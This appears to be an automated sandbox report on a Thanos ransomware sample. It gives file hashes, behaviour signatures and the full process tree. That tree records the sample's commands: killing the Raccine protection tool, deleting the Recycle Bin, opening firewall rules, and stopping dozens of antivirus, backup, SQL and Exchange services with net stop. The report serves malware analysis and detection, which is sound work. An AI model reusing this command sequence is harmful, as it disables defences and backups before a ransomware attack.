Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
25/03/2025, 15:11
250325-skmbpsxzaw 1025/03/2025, 15:06
250325-sg1d6a1px2 1025/03/2025, 15:01
250325-sd5jpsxyct 1025/03/2025, 14:56
250325-sbdcfaxxgs 1025/03/2025, 14:50
250325-r7ve6a1nv3 1025/03/2025, 14:46
250325-r5ab7sxwhx 1025/03/2025, 14:40
250325-r2c9paxwe1 1005/02/2025, 10:25
250205-mgcefaslhw 1005/02/2025, 10:17
250205-mbs51atmbk 1005/02/2025, 09:15
250205-k785zs1pfn 10Analysis
-
max time kernel
77s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
25/03/2025, 15:06
General
-
Target
RansomwareSamples/Thanos_23_03_2021_91KB.exe
-
Size
91KB
-
MD5
3e0c0275c22f75048511cbcbdcca3641
-
SHA1
18c97fafbb6bed70e3b3f88bd39fba342e49b112
-
SHA256
8a4a038a965ba42a0442d44abf25e4d21f5049d4a4a8aa9cb6691ec4282814a1
-
SHA512
c11e7606efb18af92f3b4ce800df8cc4d239fcf0c2423492f4a61a383dd2644d11b7034a53981f3f24aa2b45d654db4f7bd0527fd712e36dd578e32fd994215e
-
SSDEEP
1536:NrZGUvlLrx6FfCRo1wjAb5JjlbKTzHVt39JZmpvn+mJm:Nrk+lLr8wS1lbg39JZmpvn+mA
Score
10/10
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Modifies file permissions 1 TTPs 3 IoCs
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Drops file in Program Files directory 9 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Kills process with taskkill 48 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Thanos_23_03_2021_91KB.exeC:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Thanos_23_03_2021_91KB.exe bcdedit /set shutdown /r /f /t 21⤵
- Checks computer location settings
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
